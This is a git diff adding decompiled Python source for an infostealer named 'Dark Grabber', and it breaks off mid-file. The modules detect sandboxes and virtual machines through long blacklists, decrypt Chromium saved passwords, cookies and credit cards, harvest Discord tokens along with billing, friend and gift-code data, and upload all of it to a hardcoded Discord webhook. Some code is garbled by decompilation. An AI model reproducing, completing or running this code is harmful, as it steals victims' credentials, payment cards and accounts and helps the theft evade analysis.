diff --git a/Random/Dark Grabber/Annexes/Install Dark Grabber.py b/Random/Dark Grabber/Annexes/Install Dark Grabber.py new file mode 100755 index 0000000..4b876aa --- /dev/null +++ b/Random/Dark Grabber/Annexes/Install Dark Grabber.py @@ -0,0 +1,26 @@ +from components.antidebug import AntiDebug +from components.browsers import Browsers +from components.discordtoken import DiscordToken +from components.injection import Injection +from components.startup import Startup +from components.systeminfo import SystemInfo +from config import __CONFIG__ + +def main(): + funcs = [ + AntiDebug, + Browsers, + DiscordToken, + Injection, + Startup, + SystemInfo] + for func in funcs: + if __CONFIG__[func.__name__.lower()]: + if func.__init__.__code__.co_argcount == 2: + func(__CONFIG__['webhook']) + continue + func() + +if __name__ == '__main__': + main() + return None diff --git a/Random/Dark Grabber/Annexes/antidebug.py b/Random/Dark Grabber/Annexes/antidebug.py new file mode 100755 index 0000000..4fd9476 --- /dev/null +++ b/Random/Dark Grabber/Annexes/antidebug.py @@ -0,0 +1,472 @@ +# Source Generated with Decompyle++ +# File: antidebug.pyc (Python 3.10) + +import os +import re +import subprocess +import sys +import uuid +import psutil +import requests +from typing import Literal + +class AntiDebug: + + def __init__(self = None): + if self.checks(): + sys.exit(int()) + return None + + + def checks(self = None): + debugging = False + self.blackListedUsers = [ + 'WDAGUtilityAccount', + 'Abby', + 'hmarc', + 'patex', + 'RDhJ0CNFevzX', + 'kEecfMwgj', + 'Frank', + '8Nl0ColNQ5bq', + 'Lisa', + 'John', + 'george', + 'PxmdUOpVyx', + '8VizSM', + 'w0fjuOVmCcP5A', + 'lmVwjj9b', + 'PqONjHVwexsS', + '3u2v9m8', + 'Julia', + 'HEUeRzl', + 'fred', + 'server', + 'BvJChRPnsxn', + 'Harry Johnson', + 'SqgFOf3G', + 'Lucas', + 'mike', + 'PateX', + 'h7dk1xPr', + 'Louise', + 'User01', + 'test', + 'RGzcBUyrznReg'] + self.blackListedPCNames = [ + 'BEE7370C-8C0C-4', + 'DESKTOP-NAKFFMT', + 'WIN-5E07COS9ALR', + 'B30F0242-1C6A-4', + 'DESKTOP-VRSQLAG', + 'Q9IATRKPRH', + 'XC64ZB', + 'DESKTOP-D019GDM', + 'DESKTOP-WI8CLET', + 'SERVER1', + 'LISA-PC', + 'JOHN-PC', + 'DESKTOP-B0T93D6', + 'DESKTOP-1PYKP29', + 'DESKTOP-1Y2433R', + 'WILEYPC', + 'WORK', + '6C4E733F-C2D9-4', + 'RALPHS-PC', + 'DESKTOP-WG3MYJS', + 'DESKTOP-7XC6GEZ', + 'DESKTOP-5OV9S0O', + 'QarZhrdBpj', + 'ORELEEPC', + 'ARCHIBALDPC', + 'JULIA-PC', + 'd1bnJkfVlH', + 'NETTYPC', + 'DESKTOP-BUGIO', + 'DESKTOP-CBGPFEE', + 'SERVER-PC', + 'TIQIYLA9TW5M', + 'DESKTOP-KALVINO', + 'COMPNAME_4047', + 'DESKTOP-19OLLTD', + 'DESKTOP-DE369SE', + 'EA8C2E2A-D017-4', + 'AIDANPC', + 'LUCAS-PC', + 'MARCI-PC', + 'ACEPC', + 'MIKE-PC', + 'DESKTOP-IAPKN1P', + 'DESKTOP-NTU7VUO', + 'LOUISE-PC', + 'T00917', + 'test42'] + self.blackListedHWIDS = [ + '7AB5C494-39F5-4941-9163-47F54D6D5016', + '03DE0294-0480-05DE-1A06-350700080009', + '11111111-2222-3333-4444-555555555555', + '6F3CA5EC-BEC9-4A4D-8274-11168F640058', + 'ADEEEE9E-EF0A-6B84-B14B-B83A54AFC548', + '4C4C4544-0050-3710-8058-CAC04F59344A', + '00000000-0000-0000-0000-AC1F6BD04972', + '00000000-0000-0000-0000-000000000000', + '5BD24D56-789F-8468-7CDC-CAA7222CC121', + '49434D53-0200-9065-2500-65902500E439', + '49434D53-0200-9036-2500-36902500F022', + '777D84B3-88D1-451C-93E4-D235177420A7', + '49434D53-0200-9036-2500-369025000C65', + 'B1112042-52E8-E25B-3655-6A4F54155DBF', + '00000000-0000-0000-0000-AC1F6BD048FE', + 'EB16924B-FB6D-4FA1-8666-17B91F62FB37', + 'A15A930C-8251-9645-AF63-E45AD728C20C', + '67E595EB-54AC-4FF0-B5E3-3DA7C7B547E3', + 'C7D23342-A5D4-68A1-59AC-CF40F735B363', + '63203342-0EB0-AA1A-4DF5-3FB37DBB0670', + '44B94D56-65AB-DC02-86A0-98143A7423BF', + '6608003F-ECE4-494E-B07E-1C4615D1D93C', + 'D9142042-8F51-5EFF-D5F8-EE9AE3D1602A', + '49434D53-0200-9036-2500-369025003AF0', + '8B4E8278-525C-7343-B825-280AEBCD3BCB', + '4D4DDC94-E06C-44F4-95FE-33A1ADA5AC27', + '79AF5279-16CF-4094-9758-F88A616D81B4', + 'FF577B79-782E-0A4D-8568-B35A9B7EB76B', + '08C1E400-3C56-11EA-8000-3CECEF43FEDE', + '6ECEAF72-3548-476C-BD8D-73134A9182C8', + '49434D53-0200-9036-2500-369025003865', + '119602E8-92F9-BD4B-8979-DA682276D385', + '12204D56-28C0-AB03-51B7-44A8B7525250', + '63FA3342-31C7-4E8E-8089-DAFF6CE5E967', + '365B4000-3B25-11EA-8000-3CECEF44010C', + 'D8C30328-1B06-4611-8E3C-E433F4F9794E', + '00000000-0000-0000-0000-50E5493391EF', + '00000000-0000-0000-0000-AC1F6BD04D98', + '4CB82042-BA8F-1748-C941-363C391CA7F3', + 'B6464A2B-92C7-4B95-A2D0-E5410081B812', + 'BB233342-2E01-718F-D4A1-E7F69D026428', + '9921DE3A-5C1A-DF11-9078-563412000026', + 'CC5B3F62-2A04-4D2E-A46C-AA41B7050712', + '00000000-0000-0000-0000-AC1F6BD04986', + 'C249957A-AA08-4B21-933F-9271BEC63C85', + 'BE784D56-81F5-2C8D-9D4B-5AB56F05D86E', + 'ACA69200-3C4C-11EA-8000-3CECEF4401AA', + '3F284CA4-8BDF-489B-A273-41B44D668F6D', + 'BB64E044-87BA-C847-BC0A-C797D1A16A50', + '2E6FB594-9D55-4424-8E74-CE25A25E36B0', + '42A82042-3F13-512F-5E3D-6BF4FFFD8518', + '38AB3342-66B0-7175-0B23-F390B3728B78', + '48941AE9-D52F-11DF-BBDA-503734826431', + '032E02B4-0499-05C3-0806-3C0700080009', + 'DD9C3342-FB80-9A31-EB04-5794E5AE2B4C', + 'E08DE9AA-C704-4261-B32D-57B2A3993518', + '07E42E42-F43D-3E1C-1C6B-9C7AC120F3B9', + '88DC3342-12E6-7D62-B0AE-C80E578E7B07', + '5E3E7FE0-2636-4CB7-84F5-8D2650FFEC0E', + '96BB3342-6335-0FA8-BA29-E1BA5D8FEFBE', + '0934E336-72E4-4E6A-B3E5-383BD8E938C3', + '12EE3342-87A2-32DE-A390-4C2DA4D512E9', + '38813342-D7D0-DFC8-C56F-7FC9DFE5C972', + '8DA62042-8B59-B4E3-D232-38B29A10964A', + '3A9F3342-D1F2-DF37-68AE-C10F60BFB462', + 'F5744000-3C78-11EA-8000-3CECEF43FEFE', + 'FA8C2042-205D-13B0-FCB5-C5CC55577A35', + 'C6B32042-4EC3-6FDF-C725-6F63914DA7C7', + 'FCE23342-91F1-EAFC-BA97-5AAE4509E173', + 'CF1BE00F-4AAF-455E-8DCD-B5B09B6BFA8F', + '050C3342-FADD-AEDF-EF24-C6454E1A73C9', + '4DC32042-E601-F329-21C1-03F27564FD6C', + 'DEAEB8CE-A573-9F48-BD40-62ED6C223F20', + '05790C00-3B21-11EA-8000-3CECEF4400D0', + '5EBD2E42-1DB8-78A6-0EC3-031B661D5C57', + '9C6D1742-046D-BC94-ED09-C36F70CC9A91', + '907A2A79-7116-4CB6-9FA5-E5A58C4587CD', + 'A9C83342-4800-0578-1EE8-BA26D2A678D2', + 'D7382042-00A0-A6F0-1E51-FD1BBF06CD71', + '1D4D3342-D6C4-710C-98A3-9CC6571234D5', + 'CE352E42-9339-8484-293A-BD50CDC639A5', + '60C83342-0A97-928D-7316-5F1080A78E72', + '02AD9898-FA37-11EB-AC55-1D0C0A67EA8A', + 'DBCC3514-FA57-477D-9D1F-1CAF4CC92D0F', + 'FED63342-E0D6-C669-D53F-253D696D74DA', + '2DD1B176-C043-49A4-830F-C623FFB88F3C', + '4729AEB0-FC07-11E3-9673-CE39E79C8A00', + '84FE3342-6C67-5FC6-5639-9B3CA3D775A1', + 'DBC22E42-59F7-1329-D9F2-E78A2EE5BD0D', + 'CEFC836C-8CB1-45A6-ADD7-209085EE2A57', + 'A7721742-BE24-8A1C-B859-D7F8251A83D3', + '3F3C58D1-B4F2-4019-B2A2-2A500E96AF2E', + 'D2DC3342-396C-6737-A8F6-0C6673C1DE08', + 'EADD1742-4807-00A0-F92E-CCD933E9D8C1', + 'AF1B2042-4B90-0000-A4E4-632A1C8C7EB1', + 'FE455D1A-BE27-4BA4-96C8-967A6D3A9661', + '921E2042-70D3-F9F1-8CBD-B398A21F89C6'] + self.blackListedIPS = [ + '88.132.231.71', + '78.139.8.50', + '20.99.160.173', + '88.153.199.169', + '84.147.62.12', + '194.154.78.160', + '92.211.109.160', + '195.74.76.222', + '188.105.91.116', + '34.105.183.68', + '92.211.55.199', + '79.104.209.33', + '95.25.204.90', + '34.145.89.174', + '109.74.154.90', + '109.145.173.169', + '34.141.146.114', + '212.119.227.151', + '195.239.51.59', + '192.40.57.234', + '64.124.12.162', + '34.142.74.220', + '188.105.91.173', + '109.74.154.91', + '34.105.72.241', + '109.74.154.92', + '213.33.142.50', + '109.74.154.91', + '93.216.75.209', + '192.87.28.103', + '88.132.226.203', + '195.181.175.105', + '88.132.225.100', + '92.211.192.144', + '34.83.46.130', + '188.105.91.143', + '34.85.243.241', + '34.141.245.25', + '178.239.165.70', + '84.147.54.113', + '193.128.114.45', + '95.25.81.24', + '92.211.52.62', + '88.132.227.238', + '35.199.6.13', + '80.211.0.97', + '34.85.253.170', + '23.128.248.46', + '35.229.69.227', + '34.138.96.23', + '192.211.110.74', + '35.237.47.12', + '87.166.50.213', + '34.253.248.228', + '212.119.227.167', + '193.225.193.201', + '34.145.195.58', + '34.105.0.27', + '195.239.51.3', + '35.192.93.107'] + self.blackListedMacs = [ + '00:15:5d:00:07:34', + '00:e0:4c:b8:7a:58', + '00:0c:29:2c:c1:21', + '00:25:90:65:39:e4', + 'c8:9f:1d:b6:58:e4', + '00:25:90:36:65:0c', + '00:15:5d:00:00:f3', + '2e:b8:24:4d:f7:de', + '00:15:5d:13:6d:0c', + '00:50:56:a0:dd:00', + '00:15:5d:13:66:ca', + '56:e8:92:2e:76:0d', + 'ac:1f:6b:d0:48:fe', + '00:e0:4c:94:1f:20', + '00:15:5d:00:05:d5', + '00:e0:4c:4b:4a:40', + '42:01:0a:8a:00:22', + '00:1b:21:13:15:20', + '00:15:5d:00:06:43', + '00:15:5d:1e:01:c8', + '00:50:56:b3:38:68', + '60:02:92:3d:f1:69', + '00:e0:4c:7b:7b:86', + '00:e0:4c:46:cf:01', + '42:85:07:f4:83:d0', + '56:b0:6f:ca:0a:e7', + '12:1b:9e:3c:a6:2c', + '00:15:5d:00:1c:9a', + '00:15:5d:00:1a:b9', + 'b6:ed:9d:27:f4:fa', + '00:15:5d:00:01:81', + '4e:79:c0:d9:af:c3', + '00:15:5d:b6:e0:cc', + '00:15:5d:00:02:26', + '00:50:56:b3:05:b4', + '1c:99:57:1c:ad:e4', + '08:00:27:3a:28:73', + '00:15:5d:00:00:c3', + '00:50:56:a0:45:03', + '12:8a:5c:2a:65:d1', + '00:25:90:36:f0:3b', + '00:1b:21:13:21:26', + '42:01:0a:8a:00:22', + '00:1b:21:13:32:51', + 'a6:24:aa:ae:e6:12', + '08:00:27:45:13:10', + '00:1b:21:13:26:44', + '3c:ec:ef:43:fe:de', + 'd4:81:d7:ed:25:54', + '00:25:90:36:65:38', + '00:03:47:63:8b:de', + '00:15:5d:00:05:8d', + '00:0c:29:52:52:50', + '00:50:56:b3:42:33', + '3c:ec:ef:44:01:0c', + '06:75:91:59:3e:02', + '42:01:0a:8a:00:33', + 'ea:f6:f1:a2:33:76', + 'ac:1f:6b:d0:4d:98', + '1e:6c:34:93:68:64', + '00:50:56:a0:61:aa', + '42:01:0a:96:00:22', + '00:50:56:b3:21:29', + '00:15:5d:00:00:b3', + '96:2b:e9:43:96:76', + 'b4:a9:5a:b1:c6:fd', + 'd4:81:d7:87:05:ab', + 'ac:1f:6b:d0:49:86', + '52:54:00:8b:a6:08', + '00:0c:29:05:d8:6e', + '00:23:cd:ff:94:f0', + '00:e0:4c:d6:86:77', + '3c:ec:ef:44:01:aa', + '00:15:5d:23:4c:a3', + '00:1b:21:13:33:55', + '00:15:5d:00:00:a4', + '16:ef:22:04:af:76', + '00:15:5d:23:4c:ad', + '1a:6c:62:60:3b:f4', + '00:15:5d:00:00:1d', + '00:50:56:a0:cd:a8', + '00:50:56:b3:fa:23', + '52:54:00:a0:41:92', + '00:50:56:b3:f6:57', + '00:e0:4c:56:42:97', + 'ca:4d:4b:ca:18:cc', + 'f6:a5:41:31:b2:78', + 'd6:03:e4:ab:77:8e', + '00:50:56:ae:b2:b0', + '00:50:56:b3:94:cb', + '42:01:0a:8e:00:22', + '00:50:56:b3:4c:bf', + '00:50:56:b3:09:9e', + '00:50:56:b3:38:88', + '00:50:56:a0:d0:fa', + '00:50:56:b3:91:c8', + '3e:c1:fd:f1:bf:71', + '00:50:56:a0:6d:86', + '00:50:56:a0:af:75', + '00:50:56:b3:dd:03', + 'c2:ee:af:fd:29:21', + '00:50:56:b3:ee:e1', + '00:50:56:a0:84:88', + '00:1b:21:13:32:20', + '3c:ec:ef:44:00:d0', + '00:50:56:ae:e5:d5', + '00:50:56:97:f6:c8', + '52:54:00:ab:de:59', + '00:50:56:b3:9e:9e', + '00:50:56:a0:39:18', + '32:11:4d:d0:4a:9e', + '00:50:56:b3:d0:a7', + '94:de:80:de:1a:35', + '00:50:56:ae:5d:ea', + '00:50:56:b3:14:59', + 'ea:02:75:3c:90:9f', + '00:e0:4c:44:76:54', + 'ac:1f:6b:d0:4d:e4', + '52:54:00:3b:78:24', + '00:50:56:b3:50:de', + '7e:05:a3:62:9c:4d', + '52:54:00:b3:e4:71', + '90:48:9a:9d:d5:24', + '00:50:56:b3:3b:a6', + '92:4c:a8:23:fc:2e', + '5a:e2:a6:a4:44:db', + '00:50:56:ae:6f:54', + '42:01:0a:96:00:33', + '00:50:56:97:a1:f8', + '5e:86:e4:3d:0d:f6', + '00:50:56:b3:ea:ee', + '3e:53:81:b7:01:13', + '00:50:56:97:ec:f2', + '00:e0:4c:b3:5a:2a', + '12:f8:87:ab:13:ec', + '00:50:56:a0:38:06', + '2e:62:e8:47:14:49', + '00:0d:3a:d2:4f:1f', + '60:02:92:66:10:79', + '', + '00:50:56:a0:d7:38', + 'be:00:e5:c5:0c:e5', + '00:50:56:a0:59:10', + '00:50:56:a0:06:8d', + '00:e0:4c:cb:62:08', + '4e:81:81:8e:22:4e'] + self.blacklistedProcesses = [ + 'httpdebuggerui', + 'wireshark', + 'fiddler', + 'regedit', + 'cmd', + 'taskmgr', + 'vboxservice', + 'df5serv', + 'processhacker', + 'vboxtray', + 'vmtoolsd', + 'vmwaretray', + 'ida64', + 'ollydbg', + 'pestudio', + 'vmwareuser', + 'vgauthservice', + 'vmacthlp', + 'x96dbg', + 'vmsrvc', + 'x32dbg', + 'vmusrvc', + 'prl_cc', + 'prl_tools', + 'xenservice', + 'qemu-ga', + 'joeboxcontrol', + 'ksdumperclient', + 'ksdumper', + 'joeboxserver'] + self.check_process() + if self.get_network(): + debugging = True + if self.get_system(): + debugging = True + return debugging + + + def check_process(self = None): + pass + # WARNING: Decompyle incomplete + + + def get_network(self = None): + ip = requests.get('https://api.ipify.org').text + mac = ':'.join(re.findall('..', '%012x' % uuid.getnode())) + if ip in self.blackListedIPS: + return True + if None in self.blackListedMacs: + return True + + + def get_system(self = None): + hwid = subprocess.check_output('C:\\Windows\\System32\\wbem\\WMIC.exe csproduct get uuid', True, subprocess.PIPE, subprocess.PIPE, **('shell', 'stdin', 'stderr')).decode('utf-8').split('\n')[1].strip() + username = os.getenv('UserName') + hostname = os.getenv('COMPUTERNAME') + for i in zip(self.blackListedHWIDS, self.blackListedUsers, self.blackListedPCNames): + if hwid in i and username in i or hostname in i: + return True + return None + + diff --git a/Random/Dark Grabber/Annexes/browsers.py b/Random/Dark Grabber/Annexes/browsers.py new file mode 100755 index 0000000..799e6cb --- /dev/null +++ b/Random/Dark Grabber/Annexes/browsers.py @@ -0,0 +1,261 @@ +# Source Generated with Decompyle++ +# File: browsers.pyc (Python 3.10) + +import base64 +import json +import os +import shutil +import sqlite3 +from pathlib import Path +from zipfile import ZipFile +from Crypto.Cipher import AES +from discord import Embed, File, SyncWebhook +from win32crypt import CryptUnprotectData +__LOGINS__ = [] +__COOKIES__ = [] +__WEB_HISTORY__ = [] +__DOWNLOADS__ = [] +__CARDS__ = [] + +class Browsers: + + def __init__(self, webhook): + self.webhook = SyncWebhook.from_url(webhook) + Chromium() + Upload(self.webhook) + + + +class Upload: + + def __init__(self = None, webhook = None): + self.webhook = webhook + self.write_files() + self.send() + self.clean() + + + def write_files(self): + os.makedirs('vault', True, **('exist_ok',)) + # WARNING: Decompyle incomplete + + + def send(self): + self.webhook.send(Embed('Vault', '```' + '\n'.join(self.tree(Path('vault'))) + '```', **('title', 'description')), File('vault.zip'), **('embed', 'file')) + + + def clean(self): + shutil.rmtree('vault') + os.remove('vault.zip') + + + def tree(self = None, path = None, prefix = None, midfix_folder = ('', '\xf0\x9f\x93\x82 - ', '\xf0\x9f\x93\x84 - '), midfix_file = ('path', Path, 'prefix', str, 'midfix_folder', str, 'midfix_file', str)): + pass + # WARNING: Decompyle incomplete + + + +class Chromium: + + def __init__(self): + self.appdata = os.getenv('LOCALAPPDATA') + # WARNING: Decompyle incomplete + + + def get_master_key(self = None, path = None): + with open(path, 'r', 'utf-8', **('encoding',)) as f: + c = f.read() + None(None, None, None) + # WARNING: Decompyle incomplete + + + def decrypt_password(self = None, buff = None, master_key = None): + iv = buff[3:15] + payload = buff[15:] + cipher = AES.new(master_key, AES.MODE_GCM, iv) + decrypted_pass = cipher.decrypt(payload) + decrypted_pass = decrypted_pass[:-16].decode() + return decrypted_pass + + + def get_login_data(self = None, path = None, profile = None): + login_db = f'''{path}\\{profile}\\Login Data''' + if not os.path.exists(login_db): + return None + None.copy(login_db, 'login_db') + conn = sqlite3.connect('login_db') + cursor = conn.cursor() + cursor.execute('SELECT action_url, username_value, password_value FROM logins') + for row in cursor.fetchall(): + if not row[0] and row[1] or row[2]: + continue + password = self.decrypt_password(row[2], self.master_key) + __LOGINS__.append(Types.Login(row[0], row[1], password)) + conn.close() + os.remove('login_db') + + + def get_cookies(self = None, path = None, profile = None): + cookie_db = f'''{path}\\{profile}\\Network\\Cookies''' + if not os.path.exists(cookie_db): + return None + None.copy(cookie_db, 'cookie_db') + conn = sqlite3.connect('cookie_db') + cursor = conn.cursor() + cursor.execute('SELECT host_key, name, path, encrypted_value,expires_utc FROM cookies') + for row in cursor.fetchall(): + if not row[0] and row[1] and row[2] or row[3]: + continue + cookie = self.decrypt_password(row[3], self.master_key) + __COOKIES__.append(Types.Cookie(row[0], row[1], row[2], cookie, row[4])) + conn.close() + os.remove('cookie_db') + + + def get_web_history(self = None, path = None, profile = None): + web_history_db = f'''{path}\\{profile}\\History''' + if not os.path.exists(web_history_db): + return None + None.copy(web_history_db, 'web_history_db') + conn = sqlite3.connect('web_history_db') + cursor = conn.cursor() + cursor.execute('SELECT url, title, last_visit_time FROM urls') + for row in cursor.fetchall(): + if not row[0] and row[1] or row[2]: + continue + __WEB_HISTORY__.append(Types.WebHistory(row[0], row[1], row[2])) + conn.close() + os.remove('web_history_db') + + + def get_downloads(self = None, path = None, profile = None): + downloads_db = f'''{path}\\{profile}\\History''' + if not os.path.exists(downloads_db): + return None + None.copy(downloads_db, 'downloads_db') + conn = sqlite3.connect('downloads_db') + cursor = conn.cursor() + cursor.execute('SELECT site_url, tab_url, target_path, last_access_time FROM downloads') + for row in cursor.fetchall(): + if not row[0] and row[1] and row[2] or row[3]: + continue + __DOWNLOADS__.append(Types.Download(row[0], row[1], row[2], row[3])) + conn.close() + os.remove('downloads_db') + + + def get_credit_cards(self = None, path = None, profile = None): + cards_db = f'''{path}\\{profile}\\Web Data''' + if not os.path.exists(cards_db): + return None + None.copy(cards_db, 'cards_db') + conn = sqlite3.connect('cards_db') + cursor = conn.cursor() + cursor.execute('SELECT name_on_card, expiration_month, expiration_year, card_number_encrypted, date_modified FROM credit_cards') + for row in cursor.fetchall(): + if not row[0] and row[1] and row[2] or row[3]: + continue + card_number = self.decrypt_password(row[3], self.master_key) + __CARDS__.append(Types.CreditCard(row[0], row[1], row[2], card_number, row[4])) + conn.close() + os.remove('cards_db') + + + +class Types: + + class Login: + __qualname__ = 'Types.Login' + + def __init__(self, url, username, password): + self.url = url + self.username = username + self.password = password + + + def __str__(self): + return f'''{self.url}\t{self.username}\t{self.password}''' + + + def __repr__(self): + return self.__str__() + + + + class Cookie: + __qualname__ = 'Types.Cookie' + + def __init__(self, host, name, path, value, expires): + self.host = host + self.name = name + self.path = path + self.value = value + self.expires = expires + + + def __str__(self): + return f'''{self.host}\t{'FALSE' if self.expires == 0 else 'TRUE'}\t{self.path}\t{'FALSE' if self.host.startswith('.') else 'TRUE'}\t{self.expires}\t{self.name}\t{self.value}''' + + + def __repr__(self): + return self.__str__() + + + + class WebHistory: + __qualname__ = 'Types.WebHistory' + + def __init__(self, url, title, timestamp): + self.url = url + self.title = title + self.timestamp = timestamp + + + def __str__(self): + return f'''{self.url}\t{self.title}\t{self.timestamp}''' + + + def __repr__(self): + return self.__str__() + + + + class Download: + __qualname__ = 'Types.Download' + + def __init__(self, site_url, tab_url, target_path, last_access_time): + self.site_url = site_url + self.tab_url = tab_url + self.target_path = target_path + self.last_access_time = last_access_time + + + def __str__(self): + return f'''{self.site_url}\t{self.tab_url}\t{self.target_path}\t{self.last_access_time}''' + + + def __repr__(self): + return self.__str__() + + + + class CreditCard: + __qualname__ = 'Types.CreditCard' + + def __init__(self, name, month, year, number, date_modified): + self.name = name + self.month = month + self.year = year + self.number = number + self.date_modified = date_modified + + + def __str__(self): + return f'''{self.name}\t{self.month}\t{self.year}\t{self.number}\t{self.date_modified}''' + + + def __repr__(self): + return self.__str__() + + + diff --git a/Random/Dark Grabber/Annexes/config.py b/Random/Dark Grabber/Annexes/config.py new file mode 100755 index 0000000..ebe4370 --- /dev/null +++ b/Random/Dark Grabber/Annexes/config.py @@ -0,0 +1,11 @@ +# Source Generated with Decompyle++ +# File: config.pyc (Python 3.10) + +__CONFIG__ = { + 'webhook': 'https://discordapp.com/api/webhooks/1050142994168303628/lSVmYxnWxQ8K0VWpnbteH_ThH9-w6BaI765XntsihgtkSQOzXF2fuL5WRfEZaSGHh9Tp', + 'antidebug': True, + 'browsers': True, + 'discordtoken': True, + 'injection': True, + 'startup': True, + 'systeminfo': True } diff --git a/Random/Dark Grabber/Annexes/discordtoken.py b/Random/Dark Grabber/Annexes/discordtoken.py new file mode 100755 index 0000000..fb9fcc5 --- /dev/null +++ b/Random/Dark Grabber/Annexes/discordtoken.py @@ -0,0 +1,245 @@ +# Source Generated with Decompyle++ +# File: discordtoken.pyc (Python 3.10) + +import base64 +import json +import os +import re +import requests +from Crypto.Cipher import AES +from discord import Embed, SyncWebhook +from win32crypt import CryptUnprotectData + +class DiscordToken: + + def __init__(self, webhook): + upload_tokens(webhook).upload() + + + +class extract_tokens: + + def __init__(self = None): + self.base_url = 'https://discord.com/api/v9/users/@me' + self.appdata = os.getenv('localappdata') + self.roaming = os.getenv('appdata') + self.regexp = '[\\w-]{24}\\.[\\w-]{6}\\.[\\w-]{25,110}' + self.regexp_enc = 'dQw4w9WgXcQ:[^\\"]*' + self.tokens = [] + self.uids = [] + self.extract() + + + def extract(self = None): + pass + # WARNING: Decompyle incomplete + + + def validate_token(self = None, token = None): + r = requests.get(self.base_url, { + 'Authorization': token }, **('headers',)) + if r.status_code == 200: + return True + + + def decrypt_val(self = None, buff = None, master_key = None): + iv = buff[3:15] + payload = buff[15:] + cipher = AES.new(master_key, AES.MODE_GCM, iv) + decrypted_pass = cipher.decrypt(payload) + decrypted_pass = decrypted_pass[:-16].decode() + return decrypted_pass + + + def get_master_key(self = None, path = None): + with open(path, 'r', 'utf-8', **('encoding',)) as f: + c = f.read() + None(None, None, None) + # WARNING: Decompyle incomplete + + + +class upload_tokens: + + def __init__(self = None, webhook = None): + self.tokens = extract_tokens().tokens + self.webhook = SyncWebhook.from_url(webhook) + + + def calc_flags(self = None, flags = None): + flags_dict = { + 'DISCORD_EMPLOYEE': { + 'emoji': '<:staff:968704541946167357>', + 'shift': 0, + 'ind': 1 }, + 'DISCORD_PARTNER': { + 'emoji': '<:partner:968704542021652560>', + 'shift': 1, + 'ind': 2 }, + 'HYPESQUAD_EVENTS': { + 'emoji': '<:hypersquad_events:968704541774192693>', + 'shift': 2, + 'ind': 4 }, + 'BUG_HUNTER_LEVEL_1': { + 'emoji': '<:bug_hunter_1:968704541677723648>', + 'shift': 3, + 'ind': 4 }, + 'HOUSE_BRAVERY': { + 'emoji': '<:hypersquad_1:968704541501571133>', + 'shift': 6, + 'ind': 64 }, + 'HOUSE_BRILLIANCE': { + 'emoji': '<:hypersquad_2:968704541883261018>', + 'shift': 7, + 'ind': 128 }, + 'HOUSE_BALANCE': { + 'emoji': '<:hypersquad_3:968704541874860082>', + 'shift': 8, + 'ind': 256 }, + 'EARLY_SUPPORTER': { + 'emoji': '<:early_supporter:968704542126510090>', + 'shift': 9, + 'ind': 512 }, + 'BUG_HUNTER_LEVEL_2': { + 'emoji': '<:bug_hunter_2:968704541774217246>', + 'shift': 14, + 'ind': 16384 }, + 'VERIFIED_BOT_DEVELOPER': { + 'emoji': '<:verified_dev:968704541702905886>', + 'shift': 17, + 'ind': 131072 }, + 'CERTIFIED_MODERATOR': { + 'emoji': '<:certified_moderator:988996447938674699>', + 'shift': 18, + 'ind': 262144 }, + 'SPAMMER': { + 'emoji': '\xe2\x8c\xa8', + 'shift': 20, + 'ind': 1048704 } } + return (lambda .0 = None: [ [ +flags_dict[flag]['emoji'], +flags_dict[flag]['ind']] for flag in .0 if int(flags) & 1 << flags_dict[flag]['shift'] ])(flags_dict) + + + def upload(self): + if not self.tokens: + return None + for token in None.tokens: + user = requests.get('https://discord.com/api/v8/users/@me', { + 'Authorization': token }, **('headers',)).json() + billing = requests.get('https://discord.com/api/v6/users/@me/billing/payment-sources', { + 'Authorization': token }, **('headers',)).json() + guilds = requests.get('https://discord.com/api/v9/users/@me/guilds?with_counts=true', { + 'Authorization': token }, **('headers',)).json() + friends = requests.get('https://discord.com/api/v8/users/@me/relationships', { + 'Authorization': token }, **('headers',)).json() + gift_codes = requests.get('https://discord.com/api/v9/users/@me/outbound-promotions/codes', { + 'Authorization': token }, **('headers',)).json() + username = user['username'] + '#' + user['discriminator'] + user_id = user['id'] + email = user['email'] + phone = user['phone'] + mfa = user['mfa_enabled'] + avatar = f'''https://cdn.discordapp.com/avatars/{user_id}/{user['avatar']}.gif''' if requests.get(f'''https://cdn.discordapp.com/avatars/{user_id}/{user['avatar']}.gif''').status_code == 200 else f'''https://cdn.discordapp.com/avatars/{user_id}/{user['avatar']}.png''' + badges = ' '.join((lambda .0: [ flag[0] for flag in .0 ])(self.calc_flags(user['public_flags']))) + if user['premium_type'] == 0: + nitro = 'None' + elif user['premium_type'] == 1: + nitro = 'Nitro Classic' + elif user['premium_type'] == 2: + nitro = 'Nitro' + elif user['premium_type'] == 3: + nitro = 'Nitro Basic' + else: + nitro = 'None' + if billing: + payment_methods = [] + for method in billing: + if method['type'] == 1: + payment_methods.append('\xf0\x9f\x92\xb3') + continue + if method['type'] == 2: + payment_methods.append('<:paypal:973417655627288666>') + continue + payment_methods.append('\xe2\x9d\x93') + payment_methods = ', '.join(payment_methods) + else: + payment_methods = None + if guilds: + hq_guilds = [] + for guild in guilds: + admin = True if guild['permissions'] == '4398046511103' else False + if admin and guild['approximate_member_count'] >= 100: + owner = '\xf0\x9f\x91\x91' if guild['owner'] else '\xe2\x9d\x8c' + invites = requests.get(f'''https://discord.com/api/v8/guilds/{guild['id']}/invites''', { + 'Authorization': token }, **('headers',)).json() + if len(invites) > 0: + invite = f'''https://discord.gg/{invites[0]['code']}''' + else: + invite = 'https://youtu.be/dQw4w9WgXcQ' + hq_guilds.append(f'''\xe2\x80\x8b\n**{guild['name']} ({guild['id']})** \n Owner: `{owner}` | Members: ` \xe2\x9a\xab {guild['approximate_member_count']} / \xf0\x9f\x9f\xa2 {guild['approximate_presence_count']} / \xf0\x9f\x94\xb4 {guild['approximate_member_count'] - guild['approximate_presence_count']} `\n[Join Server]({invite})''') + if len(hq_guilds) > 0: + hq_guilds = '\n'.join(hq_guilds) + else: + hq_guilds = None + else: + hq_guilds = None + if friends: + hq_friends = [] + for friend in friends: + unprefered_flags = [ + 64, + 128, + 256, + 1048704] + inds = (lambda .0: [ flag[1] for flag in .0 ])(self.calc_flags(friend['user']['public_flags'])[::-1]) + for flag in unprefered_flags: + inds.remove(flag) if flag in inds else None + if inds != []: + hq_badges = ' '.join((lambda .0: [ flag[0] for flag in .0 ])(self.calc_flags(friend['user']['public_flags'])[::-1])) + hq_friends.append(f'''{hq_badges} - `{friend['user']['username']}#{friend['user']['discriminator']} ({friend['user']['id']})`''') + if len(hq_friends) > 0: + hq_friends = '\n'.join(hq_friends) + else: + hq_friends = None + else: + hq_friends = None + if gift_codes: + codes = [] + for code in gift_codes: + name = code['promotion']['outbound_title'] + code = code['code'] + codes.append(f''':gift: `{name}`\n:ticket: `{code}`''') + if len(codes) > 0: + codes = 